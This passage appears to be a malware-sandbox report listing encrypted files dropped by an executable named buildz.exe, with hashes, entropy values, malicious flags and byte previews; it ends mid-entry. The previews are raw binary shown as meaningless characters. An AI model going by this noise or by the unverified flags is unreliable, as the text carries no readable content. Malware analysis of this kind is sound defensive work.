                        SHA-256:2707DED3EDD6BB6FE552C1259C651C6A0FD0BAF2A44F5A7E46D626BA6F9F41D9
                        SHA-512:423BE050E89F9FF64FCD068A8F420599891AC1102F6A24EB47507A629ED71255D2DA6E9C7C79218B1E62B2899B05BA9F5C6BC775E987E8FE7977FD62C4EE5714
                        Malicious:false
                        Preview:var F.!.........CB.Qm.}t...Y..8.r.X.^.}.A.V.0.....I.&U.........X.d&....*...,.(..U..iO...........ax`...I..#..`..1.P.>..r..c,U..=.;.U.....c9...0q!;..{-.d..w.......o=.......?...u.j...^...a.-.j..lD..>..q.. ..Zt.... .J&.#.....kN3......sJ.Y~*&.....2.......w....qU.Q?.-+...B..(.c.....a..xU....K\...5.S.....F..J..LW.....?..z.4....&./......OLh..*.E.M1.l..,L.p..Uh.....J.*...U:...8?....R!).,...G...2KG..~...N....%.......\r.."k../...c...N....`......c;.B..V.(=.'.*.W..O...w..%......}^....fh.m....Q...aP.{...r.@.......T....O.......)5jN.......]lP.O#.\.........~I.p...S.g..'.Z.&...X1.......Zcw.jP.pvi...."...q.$._8..nR.>.B..'..zC.........1....}..JB.c_...$.!...2.j...9......9vA=.....C+W<k\.R.......a..jS_8...a=R....S_..u2'.......$...Y.A.._..h...}.`r2w..RQ..v/Dq....M......e....52....g..?./ ...._31.A....7.%W.[C.b....`.v9.<g....?...D.7..t:_?`;i.........L.!......a......n..o..u0Zf.N....)D...b........R.......7.`S-'O.....H...Z0.e.J.l#.s...<.3.B"..?c..E..]....R..\.ty.....V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):340
                        Entropy (8bit):7.185477499313365
                        Encrypted:false
                        SSDEEP:6:jNsr90jGJMSP2UViBnL9gWzNPmg67w7TdRj7mgsC+ZXMr8FGcii96Z:JsWjTSuT9gSNOvw7TfWgsJt26Gcii9a
                        MD5:70373875A9B9B26B7BE90A9082AFE30C
                        SHA1:A8658F0E1058B36AE9369E251E759F6C952FFA68
                        SHA-256:A36DC2BDDBDD09E36E4B45330FA91F09DB7788BCC97585A3CBF4130754254074
                        SHA-512:946B2EEB42E1831361D90C971E96ADFBB866FA76D6580818C19FAF939F9D4075ECB45929A4D015A82EDCAB5460586043B135871E6DD7F8383B7511D555F5E620
                        Malicious:false
                        Preview:z{a:1q.).X.>..&<.Q.{`.....\.Aw...P .,im.&...f.0U...Kk.!m.,..|. .....4zn...o$.....us.....zjT....X.a>...+.)}.~.I....&;.Bm.\}..R.3X........0.Z.'..N?8......'..<3.C.E..2C..c.o..7..7.Kw.SB..?..L..A..N..4.h<C.~wpg{&.....M......T.#$.-.h......I..-.F..?.cO..%EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3484
                        Entropy (8bit):7.9497381708879855
                        Encrypted:false
                        SSDEEP:96:9AU1twabKVWh9Q5DgFu1z+hxtMCFYty3nQNQtoTuA:9AU1Pi5DgF7xOoQNQtoaA
                        MD5:CE14D7F84DD49EA3EBC6185AA41C7EC3
                        SHA1:3EE7A22289780F1E42DECC8AABF727A5DB4C16C6
                        SHA-256:C047DEE8409C70DB016CE215D2CF9ECFF69E0DCA8F6FBEA69E8A0D78D18A0F80
                        SHA-512:AAC73B7339696E2B117DF6DF6363427365C0E85A9562AD3050AA8944D3B6BD407F4C328505D5F3193AD967D1E5A95A0F1807E27046F360139B40A9CEEB21E678
                        Malicious:false
                        Preview:CACHEI......C...2}......K\.Q.gx..l.G~...>....>.........M...J....Hq&...C.\.O....(!..........Z.......J.....C.......X.._.Y....r5.~....._x...).....X.....5..q.*..}..F....L..,1j.P.5&)J%.|..b.W..@X.._.GM,..6s.m.Of4tk..5l.c.......~......S.Q.HQw.F......9.......@.u..}P....b.Sw...3.8...a<.......6.).r..@.....mF.tyy..M.....G>.3...5.,.}.k..c{.RK.....n.4.....R\.......'J.6..7#|......p:./[...KM.L....47Q...j..|N...g.....%.c..-.K ...2....U.=........4..........!:T..F..x..[%clS2..P...WpU`...#..R.(Q...*C05Dz...'y...=0y1..M..)+:..j...\....(..y.r..|P.2j!!.o .}..@5B?.(.s8hQ....[..W.......b...(.|......n.:......8..10..g...Uba..i.....9q...y.K$Pm.X..C..>.../.....1....'.P..Y|4y...ns.M...{up.".=U.c........&..sC.`......[%..YN..!h.4rd.#?d<|....~)0...i.......M.;...,y[.U.K.2..=,).....l.j.&#...v[#.......m.2h.....g.,.....D...]?)7..k..v....d%..v...}.....Iw.....=.4..6v..............+d."M.....O.W.._kW....&..aD-..Y.QY..#.F.;k.+.0..s..u|....*..r..h.T...x......P:..<...+.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):290621
                        Entropy (8bit):7.203939650694251
                        Encrypted:false
                        SSDEEP:6144:VDPb4h25K7gYjhDVT8ImrIbUCnZWHDH8HDHcHRHOHVjbUq7jdBBVbKyOqaYVHRRZ:VDPb44KkChDVDcoUCnZWHDH8HDHcHRHS
                        MD5:0894EEA4B0D867FCE559383A667B7DE1
                        SHA1:7CEE275D273C597D87C26182DD4318B1C9F69798
                        SHA-256:BAED79B2DFC027D337EA403011552F126C15038884FEA7696F2DDF5F9A268319
                        SHA-512:93EC10A2B528B45A01FC7BEC27A328D74AD5EC833F0856049E193DCAFB143BD90867FFA57208C7C8B159D538B82A68BAA9F061AC1C24C1A709F0B93ED2AEEB3A
                        Malicious:false
                        Preview:#topR.U..{.t.q......{wL......~<pk8jT..#2PQ.Cz.OB.V......V...:.j.k....V*8b!.m....!..:.*.....AP:.\m6.1....)..g.\0.....xEz..x.N+.u./e..o..............-......P.C+.P;C.?......M..WX.Re...-NM.v[>*.-!E..3!j.2\....Q}...e...].....x......k8.w.@....x .;W.fa_w.)1.b...oBh[.s .....B.q...).(.a......L...Y...;...2....-..MY.?w.....G}...6\..:.`..t.:+..B..(q...C........W....U....M..(.,%.-..6RM.Z+I.7....M.S3<x..#.6...[.U4..V@...U...d.2..>..(.sD.[..k3.x.g*.Yj..'9d.o...;-.^.;.x......7u....i.Rr.a.P.e.e9...)...<.Z...)=H..X.N...=....`..H...8.+5...M{G..Q.F...Q)..:S.x...^.;g..6.D.....k.^..im5:.v.....@.g..=q..t..BW.zoW]....`*5Q..^*.a...M0....4L~..+k.F.].L..qi.....l,.~.9..0.A..'....."...Y.7.tv5.H.V.G...y.'......8D^.{.j..b......u]..>.....v5....2..S.........X...(.V.b..w..d..R.T..;.ZI_j...u..o......(...'v..A.w+@.)...sSV...`P..zO+..?`..![../.....4x....,.....Zt..-....X.V...u.1..9.......7RC}..#.....X.(...C..[.i.Y...4.).h.@7..f4....,......&......~n..Q~.z.Tn...@.e...<....Z....=.B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6235
                        Entropy (8bit):7.968780580858603
                        Encrypted:false
                        SSDEEP:192:j8HIJJ12vHE0T5UlKfFmtvO+BKODy69MA:wK/Obh+kWPOA
                        MD5:3BEEAE5552253B68BECC3D69B3DA6556
                        SHA1:D29154E00F551427C03E728C7CA97C229BCE2D1F
                        SHA-256:9BDD4228F932356927BF75BC3996750212DF2E4AD7104367AD107F429386D8F5
                        SHA-512:8556472D03A111125834AF929431BF159217F14CCE1C3BFADB77F7B7B26B90F2FA4D9E151FF6374F4DC8CF0A14B87641BAF9C3FF87E5E60136B4187724FDC0F4
                        Malicious:false
                        Preview:.b_se.O.b..`..1.fl.R...yA..UoY.6l.=..Q.0...2..t..0F..(...:......2.@...s......I.\.T.L..h...O..T.<.Vs..^....e.........lg+.....tIo...z.....l...&..a...p.S.m2.K.&KWk....7;X.tVD..&~.\f..uW...|n...R;...)...FU...;U.qS....~..s..F.S~..P!e.(,..t.E9~.(...|.............].x.....7.@.,v.r.&?..._..i)._r....l.....7.gx...12......C.Jn.I.u..1.E..c..p...kT...7...R..d4.......bu.......yr3....U.>e.)U.^ .QI...x.J.2...yp|y=A....#{Px.G<m..*.3..A..5.....da7H....?...&..`..Q*u.....t.....)%...vj.;.>W....A..p['....&....`.o..|.Q>...GRD..5&...+~;..z;........i*.......9.H....T.z.`HT.Qa.C..p..2.....".v7.........A..x.a;....A.Y<...FIHf.f..Bb...J.o.LE.......u.........zr....M.{.Noc..b.....g.Gf...R.M-VS{)...`....._EN...x...Z...?..P...P...k.;MW4..r......W....D?.]/.9..(..M.........2O...A....'KR..........4.5jFy...Z...4m...g]".z.......:S5...3...c...j..9=.....?..F..x..=.!.a'.AUG.. ...?4.....2...n..8.J...x..L..(UQ..g0..0-...gBpF.......!.....5.t6*...!....l;H..L......~#.f...&x..6.n
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20755
                        Entropy (8bit):7.991441961263899
                        Encrypted:true
                        SSDEEP:384:UCbTKrEMiGd+W/RXeoYtDZ2QrjLuBi6YnQm6bLazoDjalB5UpS+GhsA:tb1tA+W/RXlYtDZ2M2i6Yn96C8XgypSr
                        MD5:17BAA1A3F2295C0561BAA69C81C5AC31
                        SHA1:1581AF77020F56EB79A605C1EBDFDA473594E361
                        SHA-256:80CAD91E46460A7C4E9949FE6774B5690FE764E23E57118287EBD057D51E3433
                        SHA-512:3A1D14418B6821D3E246A83B39F8EE6BEC4D01A3D72E73B46D275AD2596F151F8D9A3781FC240E14DD5BF34E4F4FD1F90B0F987C2F8BA6314A14134DECF6A0B4
                        Malicious:true
                        Preview:.sw_p.t..oN....}y....V.3V..+...x.....GJ...%t......H.._.v...?W|k..R.3.R......FO..6S...3. ./:cI...8..3.|...........n6.lWK2.Wb.!f.Y...IX)..1......'.e@.u......[.....4..h...,......&.\9r.#...TV....db&d.?pO......T...X&6...... ..zY.........K/)..e..E......J.k.-.1.. ..W7......e/...L.J|.T....."...^..#w..!0&v...|.f..>....."....Y..-.v.I.x.....*.......n....J.M....[........PM.?...3:,.r..TU.E.F....".o.a....;W....b.[.v>v....-;....Q..]!L.l.j"&...<.4_.H8x;R..#....e(..7.~.wT.G..4.k...z.B...~..z.y.B..j{.."....}..q...E1...TrFK.!..p.?...;..6d....~Z:..n.J...Y.......:.N..c...:....D...j.....,.Y..F.m..JX.Btg...#m...s.L.^'z..L=.H..f...6....?..&..\.0f...4y...b........g]J^r..d.t.>..Mi."R......G*\U..4`..vEF.)[>.B.....}.M.k..j~E...C....h.CQ7..J.....!....H"....8x..}.....[.3.5hU.......}.J........2.......C.c.4a...n<-....DN..../O,K..Y.C..B......5....a7Z.g..i"..SU.SY.=UA.[.....V..."3.8.^..f..g..;.?Z....0..B.(..<..L...w.PB.$.=A..+.%4Q.W.....J2hl. @.k.&.Y`..L..fn...T.[..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):121549
                        Entropy (8bit):7.998547941482802
                        Encrypted:true
                        SSDEEP:3072:55kBgvAI9ACiUG/lRXZdbe8FqDLZAm3eI8Cm8uXNQ6zA:5DvX/iUG///bUDFAmu7Cm8umR
                        MD5:F718F17EF221E3B637AEC3CC3F949591
                        SHA1:654D91FA57A4727F967CFF1536EFA302B6477EA4
                        SHA-256:D66E3CE0A99103B11E61BC523C09A7AE7EA77323D4CDE90A83C4251CF831E5A7
                        SHA-512:E56ADEC7E36163AD70D510773FE1AAB3A2CDCCC767330F015757832EA6420D0A27170AA9473EF6B498D75ECA31CC25EE0CD6838532530C16E3C21909E7780710
                        Malicious:true
                        Preview:./*.t....Y.&".U5f.b<.V.Z8u..#.....C..c.V...`..o...|s|....nE...2x,..<@.....q.Ny.vO%ED...H..2e.[.i!.M...tg.7Ab.6o....>....2...Z..%(.. .7wq.W....]h.:Lg....5....A......>..UW..!.*.;>....f....DG.n,.B5Fft.h.s.:...<.:....7.R..WP;..\......i.....,.y6.........4R.g.m.Y...%t..yJh..C...'.W.<F..|._=.s.....79..f.)..=...0.a..o..9B.0.kqO.$..0...j....U...$.5u.y`..!dC.c3r...O.}.x..".$.w..~...`n".....A...0.M...p..G.7 \.....~....V.=-3`..F^.Y&?'t..p.._%.....@.....).Q.e.....2.D..sw.....L..K.......Y....#..;.X.k'{DlRR.+.5....@Z....q9...#.A...AN.....a..f(.3.S.,..4..|. ...t..?C,~...&)..r......o.....@i..3h..(h5...U..=.7.pR..4A.4..&.. .v..J!..eG~.*...S.49.,P.1..%.>A.eo..@.]..O...~..M.v9...:>..Z..6..Q......X..l..#..X...... G...!...[..:..I. .........C.w....../.!u...J.........@...=i...^..6.I...e.L...#UK....>.I.... 43..4......Y^..Z'.n...9.../!>^....8@...D?.I...?...>....V@2p...J.e.&..........!F...g..../.q.]......{l..4.......#.....z..g.}N\{.>..P<f=.e..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):223949
                        Entropy (8bit):7.65316334737246
                        Encrypted:false
                        SSDEEP:6144:BmMivBHRgBx3apoKBsAzTnoczherbd/KBDxBxU:9ipQIpoKBsA/oqW
                        MD5:451798834A2F7C255566F9A1E7EB2F4A
                        SHA1:8EE2D23EDFF9A953DD3033A30C3B771A71D82B90
                        SHA-256:B89811851F9D5894BBDC7184B0FB4AE13501CA2851FAF232B1C5990F4857ED5F
                        SHA-512:875E6C3C7B3675003F1EEC87926987E28FDB1CDFF561211201365CBB0751F41829C2D6D5C88FBD0E556999F4587D6675A38EE57A80825A29E2CA588C311243B2
                        Malicious:false
                        Preview:.va-M.Z..~...{,.nQ...9.... u..Ja...Nt.`....%... ....d..V.?g.;(V.._.I%..W+.;.......H.,.L.......c.?d.L.E.5SM...]...Bh..w.6...=)|p.@...l../GrJ.E....3.&..c.)"........yP\...B2....g.f.2....-.tNZ.......51.CKvhA.*....qjQ......".......N=.:.18 w...7..Jo.....,F...r...#.h ..=.L.Q..M.K..L....j..y7.&.........O?.*O.....j7.A7...@y .`.I..]W].....V.Y.9.5...s3@..!..9.8......KQ.).._.g....)..c.........:.wu...@.bTKt...^...:d.......-7.u..+;Pk.+...........@.Hr.0z..+....fZ.^..jF-$.2...f)Rj..."..x..8.#..*..t.*.>Xq.|h.YU...............X...l,.............8.4.1..]..A.wc..A1LYW.h...?.X..)L..w{..m.P.g.....B...[..;....}vt.........f..%....9fT..x.T.1}......4..n..3....G.%.4..k.;SP....J..<....).......:t...x.,.[A:r..".Ji.....o(,F.../.u.>...Tm.....2..D.(!E.w.N........i.....tdf....)....=o...8P.1..yO]......[.....[....)..o..xlH..?.|.......N...*...../..,^f.<..=.e..T{."o...JL....6.E.F..._..k..`l8)....f d.E....z. i.8Je.;.....O.<.u.}kq.j7.?.h(...s.I.:.\L.......b. .J...e....(
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):131725
                        Entropy (8bit):7.998596822882176
                        Encrypted:true
                        SSDEEP:3072:2dURxywRvwSghduiV3ePoBpeti9GkxI1CidA:I4NPghzV3eMpeti9Gkx5iq
                        MD5:4D56F82600C669C6343395C47594A378
                        SHA1:692AA17766AFDF71763AC9A617E61F5876F055A5
                        SHA-256:968F48C8BDEB7706AEC6DE31CA02F18809DE711194DACCBF39259EFA001DAC7C
                        SHA-512:15A18D5281B3D76429624BFE5C76DF969F8142E1093DB2294E737A837DA4E1DA8D689B69ADB3AD26CAB9403C61B12CAB9564231016CECD8114EF78AA445EC447
                        Malicious:true
                        Preview:./*i....k..T......[$'f3.Y}.tZl..zR....N F...K..q.n.q.)j...A$.....d .Z...^..6qvWn.}....o?.X.T+[..(......!.....WD.i.o..9.Z.]q4.*..1N.......^1...}...B.3.&.p..%..&45Id1..?u.Pz*X?..8;8.p..0. ,.....F>.m.brC./c..@.8v*1.t.kR.....{...o.8.zQn.Z.."..C..O..yq...W.3...X_~..l......$.$j:+K..ZL..Bj.q#.....sP..y.....U..#......7..F..5Z.....J`AY.....u6....wF1.t..%.D[.;v...D.$.*.r.I..3.z...n...PX..*...u@N.V0..."$....D..?..d.`...jjWR.A..L7jH0.....r......ro..E.+..+.G........th.T..I.",.Z..7.....8c.q.EV.. ..)_..~.7m....<.J.|721.9e.......{=.3.\..=...H..Jn...Z..+cK.Wd..G..J..T>d....=. .a.s.LM.8.kwp.s...h........o.m..AX."..r_.<...CW.o..`.?...H(W...*. ....g...P...L.3..Twn..?2.U.\7.=;x..xIL...v_......}.............I..t.S.K-.{......=.xI..8.4&lz.e..Lo.G.A6.M.}Q+...ty..?F..k.f.xX.~gg..A5`.X...p......e..... L.p_gh......K.,.e.+5..4.d.G.........9|......O.,.....L....i\m...4.l..;....[..W.|....w....d7.S}...I.f.[i....R..k..............b....Q5..wq..4.U.......<....6t1
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):106365
                        Entropy (8bit):7.998229398695379
                        Encrypted:true
                        SSDEEP:3072:WhqJk3TDuOtIqveSOvnRpPd82irlxTipaN8vGA:dyXhx85pPdRixwpfP
                        MD5:B3D0F85B4D968D69EBBBF3D7270C8F39
                        SHA1:22508F6081920FA9D312673839A632C4DC04AB9E
                        SHA-256:48EEEA63CEF257C7C8EE4ED442DE978CD34A4ECFACF20172A7A61C9F0493CC8F
                        SHA-512:E5FD4CA971D0BD0A22E93D1AD40491E08D3A947E085DF486439A749312DE6EE1280E99C68E88CCEFFA592F0676A5E30CB4A49A9368E30E6A078811EEC98B2B3C
                        Malicious:true
                        Preview:.(f|P...^Q....A..x.].t....V... .....#t.^..8.b...Z..........\'..`..e..."Q..C...n.X ....]...........a...Ce..E)..t...OU...m.,.>.#...).....e...(R.....6.-,.....i.x.1.c.\P.......@....T..I..^......,.jW..#.lF,.Vw...U=..V.. .d.ug.j..2.V.qs.....Yg.?....$..I..+.."..B|...rb..J.C...)...h4.).L. bB.9...s=1O:..4.)to.......:}.b?.X#.1.y4e.&.D...q..4|..|Vq.J.3........4C..r...=...zB...@'....d|......8...(..\. ...P..K.+....z9.%..1h.....'......2.\.H..~..},..e7..ug...0A...y...(.x[\\.;.w.mhQ.........|.X.>:...wL=..`stG...T.x.8...c3.z..Q,..PEW.....001g.....~.\...V....X..|....w..9.......s.<..c.>.........&.Z[.....p7k....K...3.r.x5B.V.:.ic...#|....0.\..]...onL......:M...W..M....w.5....F..@E..........w...Dba.f....z hj.FH..........X. ..@.j....-.%....,...}.!..7:."...,9]W.....4.+...#.d..K9.e.y..5./..S]4....?..+o.=..aq....V...?2.ABI/....St[.u...\ZB.(..At .(.9..,K.5.)....#'....Us..].9r_..*..H.v..7..F..........8...M..sqs..@..%....p...........m95..]........e....wGf....A.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17835
                        Entropy (8bit):7.990360399544634
                        Encrypted:true
                        SSDEEP:384:LJwLJK5z80eOe80E4xaFNkXJ7mj3lEIUjotA0k7kXv0LgJp5mvqQKqF7PA:L8Jb+j4EgXJDqt/f00nm3lNPA
                        MD5:609663D5D9BF4F29D5C738DB0C90A014
                        SHA1:AD019547EEB7174600EA04EF59AA67D21757B82E
                        SHA-256:2418C6B760C8F41AE0A8ACC1DFE70D58739E16302A7565A2792E07F0454E932A
                        SHA-512:31C8F64DB7B22E2F2602B1BC5CA090EA1A4827B5C616C0EB0D93F350839F9065784F6E93F8D75B8467E7F02D70E420C6DDAFEBD9A7B61F05CB67C973DFB7441A
                        Malicious:true
                        Preview:.!fz..\....o...R./.......8.Zh`....mB{E9."..Mg.$.j.....a.{d%..$.D.g..^}C..q../...1*k....qm.a....B..!.W...7..s.....L,?..Y0..l(/t.p.i.u.......<+.>.@.c.J....@......?..........v?K.=t7......~4z...`.bx.+..1Iy...L..(.........(@x.Q....FQt......^......=<.$..l..S......aC.,..^'. ...ncX..v.p.m..;..."......H...i.>Hv.......Ha.zj...s..t.g.]....+...~..9Fc.CJ...~ .Ce.....|..8O=.d.....m...L.8.B._.@.....$..j..3....p^.ID...=v......>....#..S3l5...8....q&>.\f.jo..4rd`.....f..&.h..h........%7.^n.`.wDc......<...B.g.&.H.....1..P.z..F..J.....I./.........59.Hn~5..T..O}.C.j....`..'A=...2f...-..GQ....D.n....e4.Dn........Fn.]X..$....C.|..L....Q.m?.g. .8)....gl2k..Cd.W[nk"...\.5......s.{.#.`>Y..r&L.......3~Wt.0c.l...6....[..:`....>]L..5.......[..3.@..b.../..M.p.d. .5.m..~T.....mE..R..gT...!...~......-S.....M...<.+..&.e...!}.O.Z.0.a...Psq.V..X.P. .r+...........^.0..6...|o..@...Q\.k..c...v.f.n.v...Ek..`.;..'.<*C.......2tH.|,.....Z(.[.@P.@w.'!D....G.%F.IeZ...e.`...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):45784
                        Entropy (8bit):7.995281490022364
                        Encrypted:true
                        SSDEEP:768:8kDwzpWPi3IPesANwXvtllz0IHtBXso0fZdLlO8z0mcy+TJrftJtIyXOfPA:lk3IPtAmXvJNHtlso0xXPU/w3A
                        MD5:7DB53991AA4D7F4AC70787387C8D1334
                        SHA1:1A89C2168815426404B186B0DEFD827D87DF5809
                        SHA-256:47CACA7DD54A535A1CDF2FEDED5AF155678CA85F5CAD3096818BA994FD8973F5
                        SHA-512:B62D6EE3B12BD86703B7A67F287C9C8DEA10430C8799922354E2E73CA2C58F2EEAB1A5B2206B82943359A1AA6EF7CCAB580BA9253B32DCF11C223A03D73143AE
                        Malicious:true
                        Preview:.va..9..pz!..j.O.sC....K.n.?.Z......}Bh.A/..x~].0.,.Y8H..1.....T......JH.....>c?........5...(...e.....%(.0.%...0..P.....=..W...E,.]Hx..f.......8d..M.m-...Zi.~..h...1;2..Gw4.T.W......`.......jI.g..F<@.....f$....<.hb..#....-RrLG.o.y..=|.~...\6....B9..-....dk3nT......"&.H\.)&:..".-+.n.c.J..r'.......k...A.d..........+\l...1h..XaE.2....G3...n.Q.N...1^sq.q..Q.e.8.2.X3.S..U9@?.!:'....&K.~g.Q.}&..+.j./20-..]..|.$..Z.m.F.b....$#..p`..0R...Qfk...X).h..y.F?ETr+u..I.&11..j....".-O.`.B.5....qZ.4..."T[.k}..hv[..1..,a2.......l.k3...].a...m..]..o.v...G.LZ...X.....K....}~w`.r......'.z-.4.M..Aq....->..q.k..D.g.';.....p.\F.....K.#...qk..O.7g&...S?.c..~.....r.;..J:..N.5...ZI.}....^qu.._.V....`.qz.....%#n.{..AD..b./......vJ.7..-v.....k.T..."..u..Z.6a....@._y`..r.z..pz..8.3.....q*V...e.S..).s.I)o)y.B`n...P....!..7.......<x^.e...<.Y.x.(.....4.3eN.9F.Ae...+.......:u...L]...>./&....*{v.q..g..b..Q6^.y.)n...K.l.7.CoYP..(p..M......xn.........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):67451
                        Entropy (8bit):7.996917205262803
                        Encrypted:true
                        SSDEEP:1536:q/qDSROZbPfluFezAkbq99BkLzPs4+X7uK97YxGAZGhe/A:wZ2bFOeTbq9TkLYD7uKJFAZGhe/A
                        MD5:3D02F2ACF70AA063C1B2852515084F86
                        SHA1:E7136F1AFF45C9D981EC4ADE2C9F9AFE91559710
                        SHA-256:63AB301D8DCE2C319AC8BCC2CD24B27F14DE705809FBB14793D59E65542E7F4C
                        SHA-512:E59522A8ECCF29799A3B3967CBD1480F8CA13923E6C8EDD3D4BAA26D80DE8B0D55C5B55B887084F0B7719317227DAC3E1EB8E1F3260637C082E7089A6F84B770
                        Malicious:true
                        Preview:.@f.~'m.=..Z.l=...............8j....GU.^..Q....I...X&.0..AE.za..r.>aTa.0...%..<..l...1.6...N.c:..^._..G.b.....j... ..f.K.b..S2....Z.)&..h%.'^.6b....f.A..,D..f.y.." ..5..#.MJ@M;...O.'.Py...T.....'.B......Q.>U..*.._..l6.sp...!x.u...ah..W.....W>.t.C.1.8...nL....Na..V.}......r^@Q...Ynv"h.wp?..r.U....$...W...`...3a.g..r.@..C..e....Z.N^....N<..={E....Q..4U......A.hm..6...`G.e..}.....`...........ZJ..f..j.QV.\.8S....y....&o0.*....}_$..s.<yY..R\......$....o.E.1..n....cj....Z..}..t....l..".{......w..#.#.c..\..r7..aQ.....^H...f..G..................w..%T9>..}6w...Z..d..5i.....[SQ....5..~A.X0.B..h......S.....Tj.ci.5.....d.d..n...k..f;`.../(.P.z..2..=.*.....i/6@.p^..]';LI.7.0......i.Q.E{...T..q.^,._....B..%..CT&@.G....W|.sm.j.VF.X(...D.]....Y..s`dh.FOB`.f..7..&....6..h@...K.a-[.S......}."..w...a.L......EkE.H4....W..*.. .v.......&.8...,........0."~...I..,Z..].]..UiDX..^7v].WE......N5}.X.b..t._I~U+.[w.......~I..<...U....bL..9......G......N/..H{..S..>.D.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):142826
                        Entropy (8bit):7.998601698641414
                        Encrypted:true
                        SSDEEP:1536:KD+LUjWCWFwHuzS4lxSMsaOPS+gD68bePxf2849MXIieRmIQIXuYfHgm4d3LNpSm:fL1wMvOPkqC+GU5IXKN0olCUS70EA
                        MD5:1F63E6DE8784DCBC022623168B99E19C
                        SHA1:845DCEE591319643C0123E73E4BE445251D119DF
                        SHA-256:CA7EE1774F706C737A89E16B82A8751B2A12B6FD9C13CDFD36E30650E22EF9FD
                        SHA-512:B6F7AA85818AC0FD6F00B0B70F2B498C198B627BE658FCE8A7A303F5D2E5EF9146CF0828789D717F9D65AB698E4D23FA56F8D95F232C65B30ECD08BAFD8F3C9A
                        Malicious:true
                        Preview:.<!..W9xnTSM.U........E.P'.0.....8....;..?.Y..2.......y.P.2.....Q.8......[s.....r.U._6...Kh.T.g...PLCk.....r...!...P..v.qo.}....)W.SW..Z.......i.....%...._.e.y..4......D#.)1.33...v.|..w.>f..r....../>.zE}/.4$E.....\|.1g9.+.~r.#iwf<j.....0.....G..0.-...QY.)........N..%....i..Pg.....7s.IZ.w.|Ab....Z...|...?....7. ./.:..Pbqu1..p.8.eL...v......s....V....b.v"`..P^.[s.3G..Hn...k...r.8..(.K.h<.D.Tm.....J..y.....~=...@+o.......m.x......r.9.L.Y.^...hd.8i......FA...lI$S..1V].....nFj.,.d.Y....yl.0..x.3g,[.Z|.u.....[=.&...b........Jd.T..=.W;....o..gMeGRF."sti.......t..W......3=O..>\..5(.h..VD.........jx.(2.....A...OX.79....(.$ Ns-mUiF.@C...W..qV(..XN..=...as....a.-...j..u$..5p.:.......j.N..a.i..S..lrg..5.....\0....v.n...?E.P...2.AJ^..9d..!....5...;:'.".P...p...|H`.K..OV]..%_.0......7*.K)y....A=MN.'..<.V.9.*.......Q-..D......L..w..3..=v.\.....B.g<.....?.o...fs..'S.._~....s..';..E..e.X...AY.w.1o......0.Q.A.[ULs..".B.i.........,...L.......u...9...5..a1..J@.w.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20740
                        Entropy (8bit):7.990561157969405
                        Encrypted:true
                        SSDEEP:384:o6i/yuGvDXFiaZuIzjUXq+MuDItumv2bhvdZwkYT/iFuIVaToX23WfA1yxRQqecE:oCvDzp0a+MuDOvU35KqFu8ad3WfZxiqQ
                        MD5:FAE98F8BCF55748234FA8E41C89E52F9
                        SHA1:98E991F93E22F944CFA171849B36C08E1CEDAA95
                        SHA-256:A020C042D4E54463DB5E4D2A13CA105AC195BA198A3AFFB198ED166DED01301F
                        SHA-512:5A10F3AA73144D414A4C9C014E9E4349D259F11A4A971F6C5D3B3A4F9C6E1E794C51197CF74A011815CB95955DE8E9BD923D64BC44C84EC2B2F95EB7F4136311
                        Malicious:true
                        Preview:..s.....Z.u.\.CYrU..;...*...t......#.1j..0..1L.XS.,d....WR.W....x.(..S?Y.2..::.W;k.h43a.t..B..}l..r+......]..&Bn.q.CA;...Ys.$.....+5$R...-.~....P...U.&.<.L..R.~....{..F..S*X9pi%.`+.61W....(...y..Pb.].JD4.x4....U.2...']....&, ..x.hz.JE.n.g...K../.F..`..I.=|x1/.-(....E..0....)a..].w.U.y.....?1.1a..NfmJ.V)..{h....../..eW)+]W.K.p5..a.a7U.........JEm.Z.J<[.M.nc......{$m.i..|X...W]..,-F.y........'.....;.z.qD...i.5Mc3o.z.;.`..t@#/..+."...N.....u.....|.....Z..+.).....$.W.x.[.N......l._l8P.5....o..0.#..s.l^..C.8....\..,.TS.bh.Q..*.Sh..^. ...&......\.o.......$/.C>......[^n.~M.$]......}..........r.B....h..i......+..4.l..*.W.#.....V..R..:^#).!...G.....hp.s.P.z..a......,h.(.u.YX....".A..@~...S.}vb...|.I.goJ....9.7.j<.E....9..I...i...iH.5MT..w...X..L..b........^M.S.&l..........^Y...c~}...D.....#.<._.kE>..D..B3.-.O..(.K..YL..*.D.Ax...R#.'IH=x.).T..~...*....N0wM.6.;...sR.s..VP....Y..*.{.'.97...m.9#}3.K.b...h.c2........k.o..R......'................wS..#.-
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6156
                        Entropy (8bit):7.975104750252544
                        Encrypted:false
                        SSDEEP:192:Y707ez9OEEceOImi1i9lLJtwqc8S3Vu6cA:Y7075/iailleD5luA
                        MD5:E26CF5EEFD6FBFF5FB4BDC8994E2A6E0
                        SHA1:A7E11917AC5949C168F50FA98608466587CC6171
                        SHA-256:03EBF20E7D754535B3739767DF0008DC66A6736E641548F94E07319658857D1C
